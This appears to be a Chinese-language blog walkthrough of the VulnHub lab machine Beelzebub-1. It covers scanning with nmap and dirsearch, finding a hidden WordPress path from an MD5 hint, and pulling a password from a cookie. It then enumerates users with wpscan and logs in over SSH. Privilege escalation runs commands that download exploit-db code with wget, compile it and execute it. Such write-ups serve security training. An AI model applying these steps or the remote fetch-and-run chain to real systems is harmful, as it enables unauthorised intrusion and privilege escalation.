『vulnhub系列』BEELZEBUB- 1 96692f0bce834b9f85ce4fb6710ae52d

『vulnhub系列』BEELZEBUB- 1

下载地址:

https://www.vulnhub.com/entry/beelzebub-1,742/

信息搜集:

使用nmap扫描存活主机,发现主机开启了22和80端口

nmap 192.168.0.*

访问80端口的web服务,发现是apache的默认页面

使用dirsearch扫描目录

dirsearch -u "http://192.168.0.140/"

发现存在phpmyadmin等页面,访问index.php页面,发现是404 /login也是一样

感觉有猫腻,查看一下源代码,果然发现一行提示

<!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5-->
#我的心被加密了,"beelzebub"不知如何被入侵了,并且被解密了 md5

大概的意思是本来是被加密的,后来被用md5解密了,现在我们使用md5加密一下

d18e1e22becbd915b45e0e655429d487

然后当作目录扫描一下

dirsearch -u "http://192.168.0.140/d18e1e22becbd915b45e0e655429d487"

然后我们发现是个Wordpress 网站,里面有登录页面(这里靶机换了ip变为192.168.0.128

还有一个文件上传的目录页面

点开Talk To VALAK 发现是个带有输入框的页面

随便输入一个数据,查看cookie 多出来一个Password 值为M4k3Ad3a1

因为是Wordpress页面,因此可以使用工具wpscan

使用命令:

wpscan --url=http://192.168.0.128/d18e1e22becbd915b45e0e655429d487/ --ignore-main-redirect --force -e --plugins-detection aggressive
  • --ignore-main-redirect 忽略重定向扫描目标
  • --force 不检查是否运行wordpress
  • -e --enumerate 枚举,默认枚举所有插件,备份
  • --plugins-detection aggressive 使用提供的模式枚举插件 默认被动(passvie)可选:混合(mix)被动(passvie)主动(aggressive)

扫描到用户valakkrampus 我们使用这两个用户名和密码M4k3Ad3a1进行登录

因为wordpress页面跳转有些问题,我们使用ssh登录,使用krampus登录成功

权限提升:

进入系统后,使用命令ls -la 发现有两个文件很可疑

但是.sudo_as_admin_successful 大小为0所以我们直接看.bash_history可以看到命令历史

然后我们发现有一个wgetgcc编译命令,我们照着运行

wget https://www.exploit-db.com/download/47009

mv 47009 ./exploit.c

gcc exploit.c -o 1

./1

成果:

热门相关:五年后,她带崽归来 豪门妈咪的反击   星星来自你   婆婆的味道   3D娜妲莉的情人   你是长夜也是烟火